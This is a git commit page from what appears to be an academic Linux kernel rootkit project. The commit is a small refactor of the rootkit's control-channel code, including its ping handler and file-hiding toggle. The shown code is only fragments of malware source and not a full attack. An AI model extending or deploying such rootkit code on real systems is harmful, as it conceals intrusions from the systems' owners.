linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit fa4cb153ac03e5df35f37e7a9464e680a3930b79
parent e884f82e538738d503e651f77edc6e56a896951f
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 10:58:58 +0100

refactors code

Diffstat:
Msrc/channel.c | 7+++----
1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/src/channel.c b/src/channel.c @@ -11,8 +11,6 @@ #define BUFLEN 4096 -static char buf[BUFLEN]; - extern rootkit_t rootkit; void @@ -39,6 +37,8 @@ detect_channel(unsigned cmd) int handle_ping(unsigned long arg) { + char buf[BUFLEN]; + if (!(const char *)arg) return -ENOTTY; @@ -65,8 +65,7 @@ handle_filehide(unsigned long arg) rootkit.hiding_files = 0; } - DEBUG_NOTICE("filehide toggled %s", - rootkit.hiding_files ? "on" : "off"); + DEBUG_NOTICE("filehide %s\n", rootkit.hiding_files ? "on" : "off"); return 0; }